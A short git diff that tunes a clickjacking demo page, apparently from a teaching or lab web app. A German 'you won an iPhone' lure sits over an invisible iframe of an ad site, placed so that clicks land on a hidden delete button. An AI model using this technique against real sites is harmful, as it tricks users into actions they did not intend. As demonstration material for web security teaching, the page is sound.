made jacking for firefox

--- a/webapps/jack/index.html
+++ b/webapps/jack/index.html
@@ -3,7 +3,7 @@
         .iframecover {
             position: absolute;
             top: 0;
-            left: 70px;
+            left: 60px;
             width: 500px;
             height: 350px;
         }
@@ -21,10 +21,11 @@
 <body>
     <input class="delete" type="button" value="HIER"/>
     <div class="iframecover">
-        <h1>Sie haben ein iPhone gewonnen!</h1>
+        <h1>WOW!</h1>
         <p>Klicken Sie </p>
         <p>um den Gewinn einzul&ouml;sen. Denn als 143256. Besucher unserer Seite sind <em>SIE</em> auserw&auml;hlt!</p>
+	<h1><b>Sie haben ein iPhone gewonnen!!!1einself</b></h1>
     </div>
-    <iframe class="invisible" scrolling="no" width="500px" height="350px" src="http://localhost:8080/ad/1"></iframe>
+    <iframe class="invisible" scrolling="no" width="500px" height="350px" src="https://vulnerads.de/ad/1"></iframe>
 </body>
 </html>
